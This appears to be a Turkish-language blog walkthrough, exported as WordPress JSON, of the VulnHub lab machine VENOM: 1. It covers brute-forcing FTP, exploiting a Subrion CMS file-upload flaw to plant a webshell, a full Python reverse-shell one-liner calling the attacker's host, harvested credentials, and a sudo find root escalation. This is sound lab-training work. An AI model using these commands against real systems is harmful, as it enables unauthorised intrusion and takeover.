{"id":1304,"date":"2021-07-06T20:00:37","date_gmt":"2021-07-06T20:00:37","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1304"},"modified":"2021-07-06T20:00:37","modified_gmt":"2021-07-06T20:00:37","slug":"venom-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/06\/venom-1\/","title":{"rendered":"VENOM: 1"},"content":{"rendered":"

Makine Hakk\u0131nda Bilgiler<\/h2>\n

A\u00e7\u0131klama:<\/strong>
\nThis machine was created for the OSCP Preparation.This box was created with virtualbox. For any queries please contact me on twitter: @avi0813. Enumeration is the Key.<\/p>\n

Vulnhub Sayfas\u0131:<\/strong>
\nhttps:\/\/www.vulnhub.com\/entry\/venom-1,701\/<\/a><\/p>\n

\u0130ndirme Sayfas\u0131:<\/strong>
\nhttps:\/\/download.vulnhub.com\/venom\/venom.zip<\/a><\/p>\n

Walkthrough<\/h2>\n

Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n

\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# arp-scan -l | grep "Systemtechnik"\n192.168.101.26  08:00:27:60:99:87   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\n        inet 192.168.101.24  netmask 255.255.255.0  broadcast 192.168.101.255\n        inet6 fe80::a00:27ff:fe8b:5efb  prefixlen 64  scopeid 0x20<link>\n        ether 08:00:27:8b:5e:fb  txqueuelen 1000  (Ethernet)\n        RX packets 114813  bytes 7942166 (7.5 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 45989  bytes 2803643 (2.6 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n<\/code><\/pre>\n
nmap taramas\u0131 ile devam edelim.<\/p>\n
[*] Scan: 513\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-06 15:38 EDT\nNmap scan report for venom.box (192.168.101.26)\nHost is up (0.00029s latency).\nNot shown: 65530 closed ports\nPORT    STATE SERVICE     VERSION\n21\/tcp  open  ftp         vsftpd 3.0.3\n80\/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))\n|_http-generator: Subrion CMS - Open Source Content Management System\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Home :: Powered by Subrion 4.2\n139\/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n443\/tcp open  ssl\/https   Apache\/2.4.29 (Ubuntu)\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\n445\/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)\nMAC Address: 08:00:27:60:99:87 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.6\nNetwork Distance: 1 hop\nService Info: Host: VENOM; OS: Unix\n\nHost script results:\n|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: -1s\n|_nbstat: NetBIOS name: VENOM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)\n|   Computer name: venom\n|   NetBIOS computer name: VENOM\\x00\n|   Domain name: \\x00\n|   FQDN: venom\n|_  System time: 2021-07-07T01:09:07+05:30\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2021-07-06T19:39:07\n|_  start_date: N\/A\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.29 ms venom.box (192.168.101.26)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 22.50 seconds\n<\/code><\/pre>\n
smb zerine enum4linux<\/strong> kulland\u0131m ve 2 tane kullan\u0131c\u0131 yakalad\u0131m. Daha sonras\u0131ndaa bu kullan\u0131c\u0131llarla ftp ve  smb i\u00e7in kabakuvvet sald\u0131r\u0131s\u0131 ba\u015flatt\u0131m ancak bir sonu\u00e7 alamad\u0131m. enum4linux<\/strong>'un gerekli \u00e7\u0131kt\u0131s\u0131 a\u015fa\u011f\u0131dad\u0131r.<\/p>\n
[+] Getting domain group memberships:\n\n ========================================================================= \n|    Users on 192.168.101.26 via RID cycling (RIDS: 500-550,1000-1050)    |\n ========================================================================= \n[I] Found new SID: S-1-22-1\n[I] Found new SID: S-1-5-21-3525385883-4254613925-43684688\n[I] Found new SID: S-1-5-32\n[+] Enumerating users using SID S-1-22-1 and logon username '', password ''\nS-1-22-1-1000 Unix User\\nathan (Local User)\nS-1-22-1-1002 Unix User\\hostinger (Local User)\n[+] Enumerating users using SID S-1-5-32 and logon username '', password ''\nS-1-5-32-500 *unknown*\\*unknown* (8)\nS-1-5-32-501 *unknown*\\*unknown* (8)\n<\/code><\/pre>\n
Nikto ve gobuster \u00e7\u0131kt\u0131lar\u0131nda bir sonu\u00e7 elde edemedim. Ancak default apache sayfas\u0131n\u0131n kaynak kodlar\u0131nda yoruma al\u0131nm\u0131\u015f bir MD5 buldum. Bunu internette k\u0131rd\u0131m.<\/p>\n
5f2a66f947fa5690c26506f66bde5c23:hostinger<\/code><\/pre>\n
Belki bir \u015fifre olabilir diye hydra'ya verdim ve ftp hesab\u0131n\u0131 k\u0131rmay\u0131 ba\u015fard\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/venom]\n\u2514\u2500# hydra -L users -P hash ftp:\/\/192.168.101.26 \nHydra v9.1 (c) 2020 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2021-07-06 13:09:33\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:5\/p:6), ~2 tries per task\n[DATA] attacking ftp:\/\/192.168.101.26:21\/\n[21][ftp] host: 192.168.101.26   login: hostinger   password: hostinger\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2021-07-06 13:09:37\n<\/code><\/pre>\n
Bunun \u00fczerine ftp ile ba\u011fland\u0131m ve bir dosya buldum.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/venom]\n\u2514\u2500# ftp 192.168.101.26\nConnected to 192.168.101.26.\n220 (vsFTPd 3.0.3)\nName (192.168.101.26:kali): hostinger\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\ndrwxr-xr-x    2 1002     1002         4096 May 21 23:43 files\n226 Directory send OK.\nftp> cd files\n250 Directory successfully changed.\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0             384 May 21 23:43 hint.txt\n226 Directory send OK.\nftp> pwd\n257 "\/files" is the current directory\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0             384 May 21 23:43 hint.txt\n226 Directory send OK.\nftp> get hint.txt\nlocal: hint.txt remote: hint.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for hint.txt (384 bytes).\n226 Transfer complete.<\/code><\/pre>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/venom]\n\u2514\u2500# cat hint.txt  \n    Hey there... \n\nT0D0 --\n\n* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=\n* some knowledge of cipher is required to decode the dora password..\n* try on venom.box\npassword -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password \n\nHave fun .. :)\n<\/code><\/pre>\n
WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=<\/strong> de\u011ferini 4 kere base64 decode ettikten sonra standard vigenere cipher<\/strong> ifadesi ile kar\u015f\u0131la\u015f\u0131yoruz.
\naHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=<\/strong> ifadesini bir kere base64 decode ettikten sonra https:\/\/cryptii.com\/pipes\/vigenere-cipher<\/a><\/strong> ifadesi ile kar\u015f\u0131la\u015f\u0131yoruz. \u0130lgili sayfaya gidip hostinger<\/strong> key'i ile decode i\u015flemi gerekle\u015ftirdim. Elde etti\u011fim sonu\u00e7:E7r9t8@Q#h%Hy+M1234<\/strong><\/p>\n
Uzun incelemeler sonucu ilk ba\u015fta bu parolay\u0131 hi\u00e7 bir yerde kullanamad\u0131\u011f\u0131m\u0131 anlad\u0131m. Daha sonras\u0131nda nota geri d\u00f6nd\u00fcm try on venom.box<\/strong>, \/etc\/hosts'a ekledikten sonra bir CMS ile kar\u015f\u0131la\u015ft\u0131m. Bu cms'e dora:E7r9t8@Q#h%Hy+M1234<\/strong> kullan\u0131c\u0131 bilgileri ile girebiliyoruz. \u0130\u00e7eri girdikten sonra dora'n\u0131n \u015fifresini test olarak g\u00fcncellledim.<\/p>\n
Elimde CMS'in version bilgisi vard\u0131 bunun \u00fczerine searchsploit'de arama yapt\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/oscp\/venom]\n\u2514\u2500# searchsploit Subrion CMS 4.2.1\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nSubrion CMS 4.2.1 - 'avatar[path]' XSS                                                                                                                                                                      | php\/webapps\/49346.txt\nSubrion CMS 4.2.1 - Cross-Site Scripting                                                                                                                                                                    | php\/webapps\/45150.txt\nSubrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)                                                                                                                                               | php\/webapps\/49876.py\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\nPapers: No Results\n<\/code><\/pre>\n
\n\u250c\u2500\u2500(root💀kali)-[~\/oscp\/venom]\n\u2514\u2500# python3 49876.py -u http:\/\/venom.box\/panel\/ -l dora -p test\n[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n\n[+] Trying to connect to: http:\/\/venom.box\/panel\/\n[+] Success!\n[+] Got CSRF token: I1fcCoH4sE8QxkwA27KKirM7IN6gfLiPiV3Y9bxh\n[+] Trying to log in...\n[+] Login Successful!\n\n[+] Generating random name for Webshell...\n[+] Generated webshell name: jabtmcowewjzpcu\n\n[+] Trying to Upload Webshell..\n[+] Upload Success... Webshell path: http:\/\/venom.box\/panel\/uploads\/jabtmcowewjzpcu.phar \n\n$ id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n$ whoami\nwww-data\n<\/code><\/pre>\n
Kod okumak ger\u00e7ekten \u00f6nemli uzun bir s\u00fcre url'nin sonuna slash koymadan exploiti \u00e7al\u0131\u015ft\u0131rmay\u0131 denedim ancak kodlar\u0131 okuyunca kbunu kendimin koymas\u0131 gerekti\u011fini anlad\u0131m. Art\u0131k i\u00e7erdeyiz. Daha d\u00fczg\u00fcn bir shell ortam\u0131 i\u00e7in kendime python ile reverse d\u00f6nd\u00fcrd\u00fcm.<\/p>\n
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.24",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("\/bin\/bash")'<\/code><\/pre>\n
hostinger kullan\u0131c\u0131s\u0131n\u0131n ftp hesab\u0131n\u0131 k\u0131rm\u0131\u015ft\u0131k. Bunun \u00fczerine hostinger hesab\u0131na giri\u015f yapt\u0131m. \u00c7ok i\u015fime yaramad\u0131 ancak mysql bilgilerini buyldum.<\/p>\n
hostinger@venom:\/var\/www\/html\/subrion\/includes$ cat config.inc.php\ncat config.inc.php\n<?php\n\/*\n * Subrion Open Source CMS 4.2.1\n * Config file generated on 20 May 2021 06:08:00\n *\/\n\ndefine('INTELLI_CONNECT', 'mysqli');\ndefine('INTELLI_DBHOST', 'localhost');\ndefine('INTELLI_DBUSER', 'eddie');\ndefine('INTELLI_DBPASS', 'v3n0mm0n3v');\ndefine('INTELLI_DBNAME', 'subrion');\ndefine('INTELLI_DBPORT', '3306');\ndefine('INTELLI_DBPREFIX', 'sbr421_');\n\ndefine('IA_SALT', '#5A7C224B51');\n\n\/\/ debug mode: 0 - disabled, 1 - enabled\ndefine('INTELLI_DEBUG', 0);\n<\/code><\/pre>\n
MariaDB [subrion]> select username, password, fullname from sbr421_members;\nselect username, password, fullname from sbr421_members;\n+------------+--------------------------------------------------------------+---------------+\n| username   | password                                                     | fullname      |\n+------------+--------------------------------------------------------------+---------------+\n| dora       | $2y$10$OKmYFixqCDv75JOAcrkC2Oqq1wZLzg3R1s1GeD88FZlAI8rRz4TJK | Administrator |\n| tester     | $2y$10$l6KUEFw\/OR9gSmuW3Cb.k.RhbwHPNXJzwfNHo\/MUjHDJsPkspRPHC | testtester    |\n| Tester@123 | $2y$10$WUnG9ihuoCtBj8ZtTKIJd.t.CI6AKk1OMyCb\/Yin9VwiC24E1gqIS | Testertest    |\n+------------+--------------------------------------------------------------+---------------+\n<\/code><\/pre>\n
Aramalar yaparken i\u00e7eride nathan<\/strong> kullan\u0131c\u0131s\u0131n\u0131n parolas\u0131n\u0131 buldum.<\/p>\n
hostinger@venom:\/var\/www\/html\/subrion\/backup$ ls\nls\ntotal 12\ndrwxr-xr-x  2 www-data www-data 4096 May 21 16:53 .\ndrwxr-xr-x 13 www-data www-data 4096 May 21 23:42 ..\n-rwxr-xr-x  1 www-data www-data   81 May 21 16:53 .htaccess\nhostinger@venom:\/var\/www\/html\/subrion\/backup$ cat .h    \ncat .htaccess \nallow from all\nYou_will_be_happy_now :)\nFzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a\nhostinger@venom:\/var\/www\/html\/subrion\/backup$ su nathan\nsu nathan\nPassword: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a\n\nnathan@venom:\/var\/www\/html\/subrion\/backup$ whoami\nwhoami\nnathan<\/code><\/pre>\n
Sonras\u0131 son derece kolayd\u0131.<\/p>\n
nathan@venom:~$ sudo -l\nsudo -l\n[sudo] password for nathan: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a\n\nMatching Defaults entries for nathan on venom:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser nathan may run the following commands on venom:\n    (root) ALL, !\/bin\/su\n    (root) ALL, !\/bin\/su<\/code><\/pre>\n
Sa\u00e7ma bir g\u00fcvenlik \u00f6nlemi...<\/p>\n
nathan@venom:~$ sudo find . -exec \/bin\/sh \\; -quit\nsudo find . -exec \/bin\/sh \\; -quit\n# id\nid\nuid=0(root) gid=0(root) groups=0(root)\n# cd \/root\ncd \/root\n# ls\nls\nroot.txt  snap\n# cat root.txt\ncat root.txt\n#root_flag\nH@v3_a_n1c3_l1fe.\n# \n<\/code><\/pre>\n
Basit makine.<\/p>\n","protected":false},"excerpt":{"rendered":"
Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: This machine was created for the OSCP Preparation.This box was created with virtualbox. For any queries please contact me on twitter:…<\/p>\n
Devam\u0131n\u0131 okuVENOM: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1304","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1304"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1304\/revisions"}],"predecessor-version":[{"id":1305,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1304\/revisions\/1305"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}